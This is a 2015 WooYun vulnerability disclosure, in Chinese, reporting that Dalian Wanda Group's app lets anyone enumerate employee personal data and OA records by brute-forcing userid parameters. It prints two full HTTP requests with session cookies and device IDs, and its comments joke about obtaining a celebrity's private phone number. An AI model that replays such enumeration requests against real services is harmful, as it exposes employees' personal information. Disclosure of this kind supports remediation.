大连万达集团APP设计缺陷可再次遍历员工个人信息和部分办公信息

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0150361

漏洞标题：大连万达集团APP设计缺陷可再次遍历员工个人信息和部分办公信息

漏洞作者：高小厨

提交时间：2015-10-29 20:33

修复时间：2015-12-13 21:12

公开时间：2015-12-13 21:12

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-10-29：细节已通知厂商并且等待厂商处理中
2015-10-29：厂商已经确认，细节仅向厂商公开
2015-11-08：细节向核心白帽子及相关领域专家公开
2015-11-18：细节向普通白帽子公开
2015-11-28：细节向实习白帽子公开
2015-12-13：细节向公众公开

简要描述：

月末了，来wooyun报道
然后才想起来还有一个贵司的VPN没有发乌云，然后今天发现用不了了。。。

详细说明：

1.还是那个“万达集团”APP
2.两个接口，获取员工个人信息，爆破userid就行了

GET http://app.wanda.cn/wanda3v/user/userinfo.html?userid=wangyang HTTP/1.1
Host: app.wanda.cn
Connection: close
Accept-Encoding: gzip
User-Agent: 万达集团 3.0 rv:6612 (iPad; iPhone OS 8.4; zh_CN)
Connection: close
Cookie: jsessionid|JSESSIONID=6c1fd8e773545ae579fcacc22a7c22df

3.获取员工OA部分信息

GET http://app.wanda.cn/wanda3v/oaapprove/oaapprovelist.html?type=1&resolution=960*640&vid=2a51f71011fc448cb186eb1958b0ec55&devid=7c7db2d9ec0c17619d0671d1088b21e22a3aa7c9&employeeid=wanglei0&sysversion=8.4&devicetype=0&num=20&start=1&datetime=1446097677&devtype=0&systype=iPhone%20OS&phonemodel=Unknown%20iPad&appname=ctx&appversion=3.0 HTTP/1.1
Host: app.wanda.cn
Connection: close
Accept-Encoding: gzip
User-Agent: 万达集团 3.0 rv:6612 (iPad; iPhone OS 8.4; zh_CN)
Connection: close
Cookie: jsessionid|JSESSIONID=4428f07da5ab0bc877967df8bf788dce

漏洞证明：

个人信息：

OA信息：

修复方案：

哎~~~还是没找到聪个电话号

版权声明：转载请注明来源高小厨@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2015-10-29 21:10

厂商回复：

感谢高小厨同学的关注与贡献！马上通知业务整改！另外，不用再试图找王思聪先生的联系方式了，因为我们也找不到。

漏洞评价：

2015-10-29 20:34 | DNS ( 普通白帽子 | Rank:543 漏洞数:61 | 没有我，你们就去背IP吧)

1
2015-10-29 20:49 | SeaPrince ( 路人 | Rank:1 漏洞数:1 | 轻轻走过梦想的花园,离开了最后希望)

1
2015-10-29 21:09 | 大胖子 ( 普通白帽子 | Rank:122 漏洞数:12 )

我的珍藏啊厨子
2015-10-29 22:05 | webshell ( 实习白帽子 | Rank:58 漏洞数:18 | 没有伞的孩子必须努力奔跑。)

谁想要王校长的联系方式！我有！哈哈！
2015-10-29 22:31 | 李旭敏 ( 普通白帽子 | Rank:607 漏洞数:88 | ฏ๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎...)

@webshell 请私聊我
2015-10-29 23:28 | Ton7BrEak ( 普通白帽子 | Rank:233 漏洞数:47 | 吃苦耐劳，我只会第一个！)

那么~小厨要过思聪的电话咯？

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0150361

漏洞标题：大连万达集团APP设计缺陷可再次遍历员工个人信息和部分办公信息

相关厂商：大连万达集团股份有限公司

漏洞作者：高小厨

提交时间：2015-10-29 20:33

修复时间：2015-12-13 21:12

公开时间：2015-12-13 21:12

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源高小厨@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0150361

漏洞标题：大连万达集团APP设计缺陷可再次遍历员工个人信息和部分办公信息

相关厂商：大连万达集团股份有限公司

漏洞作者： 高小厨

提交时间：2015-10-29 20:33

修复时间：2015-12-13 21:12

公开时间：2015-12-13 21:12

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0150361"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 高小厨@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：高小厨

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源高小厨@乌云